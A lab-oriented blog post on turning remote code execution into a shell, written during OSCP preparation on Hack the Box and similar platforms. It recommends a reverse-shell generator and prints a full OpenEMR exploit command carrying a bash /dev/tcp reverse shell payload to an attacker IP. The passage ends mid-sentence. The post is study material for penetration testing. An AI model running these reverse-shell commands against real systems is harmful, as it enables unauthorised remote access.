🖥️️ RCE to Shell Techniques 🐚

Robert Scocca
5 min readJan 26, 2021

You have Remote Code Execution on a vulnerable machine, but how do you get a shell?

While hacking vulnerable machines, you’ll find neat exploits that give you a shell on the target automatically. However, most exploits merely give Remote Code Execution(RCE) which needs to be utilized to execute further commands on a target to get a shell connection. This isn’t always straight forward, and involves alot of trail and error. Testing different reverse shell payloads and trying different techniques…

In this post, I’ve documented all the techniques I’ve found in going from RCE to shell for Linux and Windows machines. I’ve found these techniques while preparing for the OSCP exam, on ethical hacking lab platforms including Hack the Box, TryHackMe, Proving Grounds, and Pentesting with Kali Linux(PWK) Labs

Linux

Shellgen

For finding commands that launch reverse shells from a RCE exploit on Linux targets, I always use this script. Shellgen is great because it covers just about every payload you’ll find in cheatsheets on the internet.

You can enter your IP manually into the script or select by network interface, then specify the desired port. Then it gives you an option to generate a command in your desired scripting language. You can then copy paste that script in your desired RCE vector. Here’s an example on how to use it:

bash shellgen.sh tun0 80

Here I used a similar bash payload with OpenEMR < 5.0.1 — (Authenticated) Remote Code Execution in the retired Hack the Box Cache machine:

python 45161.py http://hms.htb/ -u openemr_admin -p xxxxxx -c ‘bash -i >& /dev/tcp/10.10.14.14/1337 0>&1’

Works like a charm.

It’s important to note that some vulnerable machines have some kind of firewall…